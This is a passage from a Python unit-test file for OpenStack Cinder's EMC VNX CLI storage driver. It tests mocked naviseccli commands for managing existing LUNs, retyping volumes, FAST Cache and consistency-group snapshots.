expected = [mock.call(*get_lun_cmd)]
fake_cli.assert_has_calls(expected)
def test_manage_existing_get_size(self):
"""Unit test for the manage_existing_get_size
function of driver.
"""
get_lun_cmd = ('lun', '-list', '-l', self.testData.test_lun_id,
'-state', '-status', '-opDetails', '-userCap', '-owner',
'-attachedSnapshot')
test_size = 2
commands = [get_lun_cmd]
results = [self.testData.LUN_PROPERTY('lun_name', size=test_size)]
self.configuration.storage_vnx_pool_name = \
self.testData.test_pool_name
self.driver = EMCCLIISCSIDriver(configuration=self.configuration)
assert isinstance(self.driver.cli, emc_vnx_cli.EMCVnxCliPool)
#mock the command executor
fake_command_execute = self.get_command_execute_simulator(
commands, results)
fake_cli = mock.MagicMock(side_effect=fake_command_execute)
self.driver.cli._client.command_execute = fake_cli
get_size = self.driver.manage_existing_get_size(
self.testData.test_volume_with_type,
self.testData.test_existing_ref)
expected = [mock.call(*get_lun_cmd)]
assert get_size == test_size
fake_cli.assert_has_calls(expected)
#Test the function with invalid reference.
invaild_ref = {'fake': 'fake_ref'}
self.assertRaises(exception.ManageExistingInvalidReference,
self.driver.manage_existing_get_size,
self.testData.test_volume_with_type,
invaild_ref)
def test_manage_existing_with_array_backend(self):
"""Unit test for the manage_existing with the
array backend which is not support the manage
existing functinality.
"""
#Set up the array backend
config = conf.Configuration(None)
config.append_config_values = mock.Mock(return_value=0)
config.naviseccli_path = '/opt/Navisphere/bin/naviseccli'
config.san_ip = '10.0.0.1'
config.san_login = 'sysadmin'
config.san_password = 'sysadmin'
config.default_timeout = 0.0002
config.initiator_auto_registration = True
config.navisecclicmd = '/opt/Navisphere/bin/naviseccli ' + \
'-address 10.0.0.1 -user sysadmin -password sysadmin -scope 0 '
config.iscsi_initiators = '{"fakehost": ["10.0.0.2"]}'
self.driver = EMCCLIISCSIDriver(configuration=config)
assert isinstance(self.driver.cli, emc_vnx_cli.EMCVnxCliArray)
#mock the command executor
lun_rename_cmd = ('lun', '-modify', '-l', self.testData.test_lun_id,
'-newName', 'vol_with_type', '-o')
commands = [lun_rename_cmd]
results = [SUCCEED]
#mock the command executor
fake_command_execute = self.get_command_execute_simulator(
commands, results)
fake_cli = mock.MagicMock(side_effect=fake_command_execute)
self.driver.cli._client.command_execute = fake_cli
self.driver.manage_existing(
self.testData.test_volume_with_type,
self.testData.test_existing_ref)
expected = [mock.call(*lun_rename_cmd)]
fake_cli.assert_has_calls(expected)
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(return_value=1))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase."
"get_lun_id_by_name",
mock.Mock(return_value=1))
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
@mock.patch(
"time.time",
mock.Mock(return_value=123456))
def test_retype_compressed_to_deduplicated(self):
"""Unit test for retype compressed to deduplicated."""
diff_data = {'encryption': {}, 'qos_specs': {},
'extra_specs':
{'storagetype:provsioning': ('compressed',
'deduplicated')}}
new_type_data = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:provisioning':
'deduplicated'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
host_test_data = {'host': 'ubuntu-server12@pool_backend_1',
'capabilities':
{'location_info': 'unit_test_pool|FNM00124500890',
'volume_backend_name': 'pool_backend_1',
'storage_protocol': 'iSCSI'}}
commands = [self.testData.NDU_LIST_CMD,
('snap', '-list', '-res', 1)]
results = [self.testData.NDU_LIST_RESULT,
('No snap', 1023)]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
CommandLineHelper.get_array_serial = mock.Mock(
return_value={'array_serial': "FNM00124500890"})
extra_specs = {'storagetype:provisioning': 'compressed'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
self.driver.retype(None, self.testData.test_volume3,
new_type_data,
diff_data,
host_test_data)
expect_cmd = [
mock.call('snap', '-list', '-res', 1),
mock.call(*self.testData.LUN_CREATION_CMD(
'vol3-123456', 2, 'unit_test_pool', 'deduplicated', None)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol3-123456')),
mock.call(*self.testData.MIGRATION_CMD(), retry_disable=True)]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(return_value=1))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.CommandLineHelper." +
"get_lun_by_name",
mock.Mock(return_value={'lun_id': 1}))
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
@mock.patch(
"time.time",
mock.Mock(return_value=123456))
def test_retype_thin_to_compressed_auto(self):
"""Unit test for retype thin to compressed and auto tiering."""
diff_data = {'encryption': {}, 'qos_specs': {},
'extra_specs':
{'storagetype:provsioning': ('thin',
'compressed'),
'storagetype:tiering': (None, 'auto')}}
new_type_data = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:provisioning':
'compressed',
'storagetype:tiering': 'auto'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
host_test_data = {'host': 'ubuntu-server12@pool_backend_1',
'capabilities':
{'location_info': 'unit_test_pool|FNM00124500890',
'volume_backend_name': 'pool_backend_1',
'storage_protocol': 'iSCSI'}}
commands = [self.testData.NDU_LIST_CMD,
('snap', '-list', '-res', 1)]
results = [self.testData.NDU_LIST_RESULT,
('No snap', 1023)]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
CommandLineHelper.get_array_serial = mock.Mock(
return_value={'array_serial': "FNM00124500890"})
extra_specs = {'storagetype:provisioning': 'thin'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
self.driver.retype(None, self.testData.test_volume3,
new_type_data,
diff_data,
host_test_data)
expect_cmd = [
mock.call('snap', '-list', '-res', 1),
mock.call(*self.testData.LUN_CREATION_CMD(
'vol3-123456', 2, 'unit_test_pool', 'compressed', 'auto')),
mock.call(*self.testData.ENABLE_COMPRESSION_CMD(1)),
mock.call(*self.testData.MIGRATION_CMD(), retry_disable=True)]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(return_value=1))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.CommandLineHelper." +
"get_lun_by_name",
mock.Mock(return_value={'lun_id': 1}))
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
@mock.patch(
"time.time",
mock.Mock(return_value=123456))
def test_retype_pool_changed_dedup_to_compressed_auto(self):
"""Unit test for retype dedup to compressed and auto tiering
and pool changed
"""
diff_data = {'encryption': {}, 'qos_specs': {},
'extra_specs':
{'storagetype:provsioning': ('deduplicated',
'compressed'),
'storagetype:tiering': (None, 'auto'),
'storagetype:pool': ('unit_test_pool',
'unit_test_pool2')}}
new_type_data = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:provisioning':
'compressed',
'storagetype:tiering': 'auto',
'storagetype:pool':
'unit_test_pool2'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
host_test_data = {'host': 'ubuntu-server12@pool_backend_1',
'capabilities':
{'location_info': 'unit_test_pool2|FNM00124500890',
'volume_backend_name': 'pool_backend_1',
'storage_protocol': 'iSCSI'}}
commands = [self.testData.NDU_LIST_CMD,
('snap', '-list', '-res', 1)]
results = [self.testData.NDU_LIST_RESULT,
('No snap', 1023)]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
CommandLineHelper.get_array_serial = mock.Mock(
return_value={'array_serial': "FNM00124500890"})
extra_specs = {'storagetype:provisioning': 'deduplicated',
'storagetype:pool': 'unit_test_pool'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
self.driver.retype(None, self.testData.test_volume3,
new_type_data,
diff_data,
host_test_data)
expect_cmd = [
mock.call('snap', '-list', '-res', 1),
mock.call(*self.testData.LUN_CREATION_CMD(
'vol3-123456', 2, 'unit_test_pool2', 'compressed', 'auto')),
mock.call(*self.testData.ENABLE_COMPRESSION_CMD(1)),
mock.call(*self.testData.MIGRATION_CMD(), retry_disable=True)]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(return_value=1))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.CommandLineHelper." +
"get_lun_by_name",
mock.Mock(return_value={'lun_id': 1}))
def test_retype_compressed_auto_to_compressed_nomovement(self):
"""Unit test for retype only tiering changed."""
diff_data = {'encryption': {}, 'qos_specs': {},
'extra_specs':
{'storagetype:tiering': ('auto', 'nomovement')}}
new_type_data = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:provisioning':
'compressed',
'storagetype:tiering': 'nomovement',
'storagetype:pool':
'unit_test_pool'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
host_test_data = {'host': 'ubuntu-server12@pool_backend_1',
'capabilities':
{'location_info': 'unit_test_pool|FNM00124500890',
'volume_backend_name': 'pool_backend_1',
'storage_protocol': 'iSCSI'}}
commands = [self.testData.NDU_LIST_CMD,
('snap', '-list', '-res', 1)]
results = [self.testData.NDU_LIST_RESULT,
('No snap', 1023)]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
CommandLineHelper.get_array_serial = mock.Mock(
return_value={'array_serial': "FNM00124500890"})
extra_specs = {'storagetype:provisioning': 'compressed',
'storagetype:pool': 'unit_test_pool',
'storagetype:tiering': 'auto'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
self.driver.retype(None, self.testData.test_volume3,
new_type_data,
diff_data,
host_test_data)
expect_cmd = [
mock.call('lun', '-modify', '-name', 'vol3', '-o', '-initialTier',
'optimizePool', '-tieringPolicy', 'noMovement')]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(return_value=1))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.CommandLineHelper." +
"get_lun_by_name",
mock.Mock(return_value={'lun_id': 1}))
def test_retype_compressed_to_thin_cross_array(self):
"""Unit test for retype cross array."""
diff_data = {'encryption': {}, 'qos_specs': {},
'extra_specs':
{'storagetype:provsioning': ('compressed', 'thin')}}
new_type_data = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:provisioning': 'thin',
'storagetype:pool':
'unit_test_pool'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
host_test_data = {'host': 'ubuntu-server12@pool_backend_2',
'capabilities':
{'location_info': 'unit_test_pool|FNM00124500891',
'volume_backend_name': 'pool_backend_2',
'storage_protocol': 'iSCSI'}}
commands = [self.testData.NDU_LIST_CMD,
('snap', '-list', '-res', 1)]
results = [self.testData.NDU_LIST_RESULT,
('No snap', 1023)]
self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
CommandLineHelper.get_array_serial = mock.Mock(
return_value={'array_serial': "FNM00124500890"})
extra_specs = {'storagetype:provisioning': 'thin',
'storagetype:pool': 'unit_test_pool'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
retyped = self.driver.retype(None, self.testData.test_volume3,
new_type_data, diff_data,
host_test_data)
self.assertFalse(retyped,
"Retype should failed due to"
" different protocol or array")
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(return_value=1))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.CommandLineHelper." +
"get_lun_by_name",
mock.Mock(return_value={'lun_id': 1}))
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
@mock.patch(
"time.time",
mock.Mock(return_value=123456))
def test_retype_thin_auto_to_dedup_diff_procotol(self):
"""Unit test for retype different procotol."""
diff_data = {'encryption': {}, 'qos_specs': {},
'extra_specs':
{'storagetype:provsioning': ('thin', 'deduplicated'),
'storagetype:tiering': ('auto', None)}}
new_type_data = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:provisioning':
'deduplicated',
'storagetype:pool':
'unit_test_pool'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
host_test_data = {'host': 'ubuntu-server12@pool_backend_2',
'capabilities':
{'location_info': 'unit_test_pool|FNM00124500890',
'volume_backend_name': 'pool_backend_2',
'storage_protocol': 'FC'}}
commands = [self.testData.NDU_LIST_CMD,
('snap', '-list', '-res', 1)]
results = [self.testData.NDU_LIST_RESULT,
('No snap', 1023)]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
CommandLineHelper.get_array_serial = mock.Mock(
return_value={'array_serial': "FNM00124500890"})
extra_specs = {'storagetype:provisioning': 'thin',
'storagetype:tiering': 'auto',
'storagetype:pool': 'unit_test_pool'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
self.driver.retype(None, self.testData.test_volume3,
new_type_data,
diff_data,
host_test_data)
expect_cmd = [
mock.call('snap', '-list', '-res', 1),
mock.call(*self.testData.LUN_CREATION_CMD(
'vol3-123456', 2, 'unit_test_pool', 'deduplicated', None)),
mock.call(*self.testData.MIGRATION_CMD(), retry_disable=True)]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(return_value=1))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.CommandLineHelper." +
"get_lun_by_name",
mock.Mock(return_value={'lun_id': 1}))
def test_retype_thin_auto_has_snap_to_thick_highestavailable(self):
"""Unit test for retype volume has snap when need migration."""
diff_data = {'encryption': {}, 'qos_specs': {},
'extra_specs':
{'storagetype:provsioning': ('thin', None),
'storagetype:tiering': ('auto', 'highestAvailable')}}
new_type_data = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:tiering':
'highestAvailable',
'storagetype:pool':
'unit_test_pool'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
host_test_data = {'host': 'ubuntu-server12@pool_backend_1',
'capabilities':
{'location_info': 'unit_test_pool|FNM00124500890',
'volume_backend_name': 'pool_backend_1',
'storage_protocol': 'iSCSI'}}
commands = [self.testData.NDU_LIST_CMD,
('snap', '-list', '-res', 1)]
results = [self.testData.NDU_LIST_RESULT,
('Has snap', 0)]
self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
CommandLineHelper.get_array_serial = mock.Mock(
return_value={'array_serial': "FNM00124500890"})
extra_specs = {'storagetype:provisioning': 'thin',
'storagetype:tiering': 'auto',
'storagetype:pool': 'unit_test_pool'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
retyped = self.driver.retype(None, self.testData.test_volume3,
new_type_data,
diff_data,
host_test_data)
self.assertFalse(retyped,
"Retype should failed due to"
" different protocol or array")
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(return_value=1))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.CommandLineHelper." +
"get_lun_by_name",
mock.Mock(return_value={'lun_id': 1}))
def test_retype_thin_auto_to_thin_auto(self):
"""Unit test for retype volume which has no change."""
diff_data = {'encryption': {}, 'qos_specs': {},
'extra_specs': {}}
new_type_data = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:tiering':
'auto',
'storagetype:provisioning':
'thin'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
host_test_data = {'host': 'ubuntu-server12@pool_backend_1',
'capabilities':
{'location_info': 'unit_test_pool|FNM00124500890',
'volume_backend_name': 'pool_backend_1',
'storage_protocol': 'iSCSI'}}
commands = [self.testData.NDU_LIST_CMD]
results = [self.testData.NDU_LIST_RESULT]
self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
CommandLineHelper.get_array_serial = mock.Mock(
return_value={'array_serial': "FNM00124500890"})
extra_specs = {'storagetype:provisioning': 'thin',
'storagetype:tiering': 'auto',
'storagetype:pool': 'unit_test_pool'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
self.driver.retype(None, self.testData.test_volume3,
new_type_data,
diff_data,
host_test_data)
def test_create_volume_with_fastcache(self):
'''enable fastcache when creating volume.'''
extra_specs = {'fast_cache_enabled': 'True'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol_with_type'),
self.testData.NDU_LIST_CMD,
self.testData.CHECK_FASTCACHE_CMD(
self.testData.test_pool_name)]
results = [self.testData.LUN_PROPERTY('vol_with_type', True),
SUCCEED,
('FAST Cache: Enabled', 0)]
fake_cli = self.driverSetup(commands, results)
lun_info = {'lun_name': "vol_with_type",
'lun_id': 1,
'pool': "unit_test_pool",
'attached_snapshot': "N/A",
'owner': "A",
'total_capacity_gb': 1.0,
'state': "Ready",
'status': 'OK(0x0)',
'operation': 'None'
}
self.configuration.storage_vnx_pool_name = \
self.testData.test_pool_name
self.driver = EMCCLIISCSIDriver(configuration=self.configuration)
assert isinstance(self.driver.cli, emc_vnx_cli.EMCVnxCliPool)
cli_helper = self.driver.cli._client
cli_helper.command_execute = fake_cli
cli_helper.get_lun_by_name = mock.Mock(return_value=lun_info)
cli_helper.get_enablers_on_array = mock.Mock(return_value="-FASTCache")
self.driver.update_volume_stats()
self.driver.create_volume(self.testData.test_volume_with_type)
self.assertEqual(self.driver.cli.stats['fast_cache_enabled'], 'True')
expect_cmd = [
mock.call('storagepool', '-list', '-name',
'Pool_02_SASFLASH', '-userCap', '-availableCap'),
mock.call('-np', 'storagepool', '-list', '-name',
'Pool_02_SASFLASH', '-fastcache'),
mock.call('lun', '-create', '-capacity',
1, '-sq', 'gb', '-poolName', 'Pool_02_SASFLASH',
'-name', 'vol_with_type', '-type', 'NonThin')
]
fake_cli.assert_has_calls(expect_cmd)
def test_get_lun_id_provider_location_exists(self):
'''test function get_lun_id.'''
self.driverSetup()
volume_01 = {
'name': 'vol_01',
'size': 1,
'volume_name': 'vol_01',
'id': '1',
'name_id': '1',
'provider_location': 'system^FNM11111|type^lun|lun_id^1',
'project_id': 'project',
'display_name': 'vol_01',
'display_description': 'test volume',
'volume_type_id': None,
'volume_admin_metadata': [{'key': 'readonly', 'value': 'True'}]}
self.assertEqual(self.driver.cli.get_lun_id(volume_01), 1)
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.CommandLineHelper." +
"get_lun_by_name",
mock.Mock(return_value={'lun_id': 2}))
def test_get_lun_id_provider_location_has_no_lun_id(self):
'''test function get_lun_id.'''
self.driverSetup()
volume_02 = {
'name': 'vol_02',
'size': 1,
'volume_name': 'vol_02',
'id': '2',
'provider_location': 'system^FNM11111|type^lun|',
'project_id': 'project',
'display_name': 'vol_02',
'display_description': 'test volume',
'volume_type_id': None,
'volume_admin_metadata': [{'key': 'readonly', 'value': 'True'}]}
self.assertEqual(self.driver.cli.get_lun_id(volume_02), 2)
def test_create_consistency_group(self):
cg_name = self.testData.test_cg['id']
commands = [self.testData.CREATE_CONSISTENCYGROUP_CMD(cg_name)]
results = [SUCCEED]
fake_cli = self.driverSetup(commands, results)
model_update = self.driver.create_consistencygroup(
None, self.testData.test_cg)
self.assertDictMatch({'status': 'available'}, model_update)
expect_cmd = [
mock.call(
*self.testData.CREATE_CONSISTENCYGROUP_CMD(
cg_name))]
fake_cli.assert_has_calls(expect_cmd)
def test_delete_consistency_group(self):
cg_name = self.testData.test_cg['id']
commands = [self.testData.DELETE_CONSISTENCYGROUP_CMD(cg_name),
self.testData.LUN_DELETE_CMD('vol1')]
results = [SUCCEED, SUCCEED]
fake_cli = self.driverSetup(commands, results)
self.driver.db = mock.MagicMock()
self.driver.db.volume_get_all_by_group.return_value =\
self.testData.CONSISTENCY_GROUP_VOLUMES()
self.driver.delete_consistencygroup(None,
self.testData.test_cg)
expect_cmd = [
mock.call(
*self.testData.DELETE_CONSISTENCYGROUP_CMD(
cg_name)),
mock.call(
*self.testData.LUN_DELETE_CMD('vol1')),
mock.call(
*self.testData.LUN_DELETE_CMD('vol1'))]
fake_cli.assert_has_calls(expect_cmd)
def test_create_cgsnapshot(self):
cgsnapshot = self.testData.test_cgsnapshot['id']
cg_name = self.testData.test_cgsnapshot['consistencygroup_id']
commands = [self.testData.CREATE_CG_SNAPSHOT(cg_name, cgsnapshot)]
results = [SUCCEED]
fake_cli = self.driverSetup(commands, results)
self.driver.db = mock.MagicMock()
self.driver.db.volume_get_all_by_group.return_value =\
self.testData.SNAPS_IN_SNAP_GROUP()
self.driver.create_cgsnapshot(None, self.testData.test_cgsnapshot)
expect_cmd = [
mock.call(
*self.testData.CREATE_CG_SNAPSHOT(
cg_name, cgsnapshot))]
fake_cli.assert_has_calls(expect_cmd)
def test_delete_cgsnapshot(self):
snap_name = self.testData.test_cgsnapshot['id']
commands = [self.testData.DELETE_CG_SNAPSHOT(snap_name)]
results = [SUCCEED]
fake_cli = self.driverSetup(commands, results)
self.driver.db = mock.MagicMock()
self.driver.db.snapshot_get_all_for_cgsnapshot.return_value =\
self.testData.SNAPS_IN_SNAP_GROUP()
self.driver.delete_cgsnapshot(None,
self.testData.test_cgsnapshot)
expect_cmd = [
mock.call(
*self.testData.DELETE_CG_SNAPSHOT(
snap_name))]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
def test_add_volume_to_cg(self):
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol1'),
self.testData.ADD_LUN_TO_CG_CMD('cg_id', 1),
self.testData.GET_CG_BY_NAME_CMD('cg_id')
]
results = [self.testData.LUN_PROPERTY('vol1', True),
SUCCEED,
self.testData.CG_PROPERTY('cg_id')]
fake_cli = self.driverSetup(commands, results)
self.driver.create_volume(self.testData.test_volume_cg)
expect_cmd = [
mock.call(*self.testData.LUN_CREATION_CMD(
'vol1', 1,
'unit_test_pool',
None, None)),
mock.call('lun', '-list', '-name', 'vol1',
'-state', '-status', '-opDetails',
'-userCap', '-owner', '-attachedSnapshot'),
mock.call(*self.testData.ADD_LUN_TO_CG_CMD(
'cg_id', 1))]
fake_cli.assert_has_calls(expect_cmd)
def test_create_cloned_volume_from_consistnecy_group(self):
cmd_smp = ('lun', '-list', '-name', 'vol1', '-attachedSnapshot')
output_smp = ("""LOGICAL UNIT NUMBER 1
Name: vol1
Attached Snapshot: N/A""", 0)
cmd_dest = self.testData.LUN_PROPERTY_ALL_CMD("vol1_dest")
output_dest = self.testData.LUN_PROPERTY("vol1_dest")
cmd_migrate = self.testData.MIGRATION_CMD(1, 1)
output_migrate = ("", 0)
cmd_migrate_verify = self.testData.MIGRATION_VERIFY_CMD(1)
output_migrate_verify = (r'The specified source LUN '
'is not currently migrating', 23)
cg_name = self.testData.test_cgsnapshot['consistencygroup_id']
commands = [cmd_smp, cmd_dest, cmd_migrate,
cmd_migrate_verify]
results = [output_smp, output_dest, output_migrate,
output_migrate_verify]
fake_cli = self.driverSetup(commands, results)
self.driver.create_cloned_volume(self.testData.test_volume_clone_cg,
self.testData.test_clone_cg)
tmp_cgsnapshot = 'tmp-cgsnapshot-' + self.testData.test_volume['id']
expect_cmd = [
mock.call(
*self.testData.CREATE_CG_SNAPSHOT(cg_name, tmp_cgsnapshot)),
mock.call(*self.testData.SNAP_MP_CREATE_CMD(name='vol1',
source='clone1')),
mock.call(
*self.testData.SNAP_ATTACH_CMD(
name='vol1', snapName=tmp_cgsnapshot)),
mock.call(*self.testData.LUN_CREATION_CMD(
'vol1_dest', 1, 'unit_test_pool', None, None)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1_dest')),
mock.call(*self.testData.MIGRATION_CMD(1, 1),
retry_disable=True),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(1)),
mock.call('lun', '-list', '-name', 'vol1', '-attachedSnapshot'),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call(*self.testData.DELETE_CG_SNAPSHOT(tmp_cgsnapshot))]
fake_cli.assert_has_calls(expect_cmd)
def test_create_volume_from_cgsnapshot(self):
cmd_smp = ('lun', '-list', '-name', 'vol2', '-attachedSnapshot')
output_smp = ("""LOGICAL UNIT NUMBER 1
Name: vol2
Attached Snapshot: N/A""", 0)
cmd_dest = self.testData.LUN_PROPERTY_ALL_CMD("vol2_dest")
output_dest = self.testData.LUN_PROPERTY("vol2_dest")
cmd_migrate = self.testData.MIGRATION_CMD(1, 1)
output_migrate = ("", 0)
cmd_migrate_verify = self.testData.MIGRATION_VERIFY_CMD(1)
output_migrate_verify = (r'The specified source LUN '
'is not currently migrating', 23)
commands = [cmd_smp, cmd_dest, cmd_migrate, cmd_migrate_verify]
results = [output_smp, output_dest, output_migrate,
output_migrate_verify]
fake_cli = self.driverSetup(commands, results)
self.driver.create_volume_from_snapshot(
self.testData.volume_in_cg, self.testData.test_member_cgsnapshot)
expect_cmd = [
mock.call(
*self.testData.SNAP_MP_CREATE_CMD(
name='vol2', source='vol1')),
mock.call(
*self.testData.SNAP_ATTACH_CMD(
name='vol2', snapName='cgsnapshot_id')),
mock.call(*self.testData.LUN_CREATION_CMD(
'vol2_dest', 1, 'unit_test_pool', None, None)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest')),
mock.call(*self.testData.MIGRATION_CMD(1, 1),
retry_disable=True),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(1)),
mock.call('lun', '-list', '-name', 'vol2', '-attachedSnapshot'),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2'))]
fake_cli.assert_has_calls(expect_cmd)
def succeed_fake_command_execute(self, *command, **kwargv):
return SUCCEED
def fake_get_pool_properties(self, filter_option, properties=None):
pool_info = {'pool_name': "unit_test_pool0",
'total_capacity_gb': 1000.0,
'free_capacity_gb': 1000.0
}
return pool_info
def fake_get_lun_properties(self, filter_option, properties=None):
lun_info = {'lun_name': "vol1",
'lun_id': 1,
'pool': "unit_test_pool",
'attached_snapshot': "N/A",
'owner': "A",
'total_capacity_gb': 1.0,
'state': "Ready"}
return lun_info
def fake_safe_get(self, value):
if value == "storage_vnx_pool_name":
return "unit_test_pool"
elif 'volume_backend_name' == value:
return "namedbackend"
else:
return None
class EMCVNXCLIDriverFCTestCase(test.TestCase):
def setUp(self):
super(EMCVNXCLIDriverFCTestCase, self).setUp()
self.stubs.Set(CommandLineHelper, 'command_execute',
self.succeed_fake_command_execute)
self.stubs.Set(CommandLineHelper, 'get_array_serial',
mock.Mock(return_value={'array_serial':
"fakeSerial"}))
self.stubs.Set(os.path, 'exists', mock.Mock(return_value=1))
self.stubs.Set(emc_vnx_cli, 'INTERVAL_5_SEC', 0.01)
self.stubs.Set(emc_vnx_cli, 'INTERVAL_30_SEC', 0.01)
self.stubs.Set(emc_vnx_cli, 'INTERVAL_60_SEC', 0.01)
self.configuration = conf.Configuration(None)
self.configuration.append_config_values = mock.Mock(return_value=0)
self.configuration.naviseccli_path = '/opt/Navisphere/bin/naviseccli'
self.configuration.san_ip = '10.0.0.1'
self.configuration.storage_vnx_pool_name = 'unit_test_pool'
self.configuration.san_login = 'sysadmin'
self.configuration.san_password = 'sysadmin'
#set the timeout to 0.012s = 0.0002 * 60 = 1.2ms
self.configuration.default_timeout = 0.0002
self.configuration.initiator_auto_registration = True
self.configuration.zoning_mode = None
self.stubs.Set(self.configuration, 'safe_get', self.fake_safe_get)
self.testData = EMCVNXCLIDriverTestData()
self.navisecclicmd = '/opt/Navisphere/bin/naviseccli ' + \
'-address 10.0.0.1 -user sysadmin -password sysadmin -scope 0 '
def tearDown(self):
super(EMCVNXCLIDriverFCTestCase, self).tearDown()
def driverSetup(self, commands=tuple(), results=tuple()):
self.driver = EMCCLIFCDriver(configuration=self.configuration)
fake_command_execute = self.get_command_execute_simulator(
commands, results)
fake_cli = mock.Mock(side_effect=fake_command_execute)
self.driver.cli._client.command_execute = fake_cli
return fake_cli
def get_command_execute_simulator(self, commands=tuple(),
results=tuple()):
assert(len(commands) == len(results))
def fake_command_execute(*args, **kwargv):
for i in range(len(commands)):
if args == commands[i]:
if isinstance(results[i], list):
if len(results[i]) > 0:
ret = results[i][0]
del results[i][0]
return ret
else:
return results[i]
return self.standard_fake_command_execute(*args, **kwargv)
return fake_command_execute
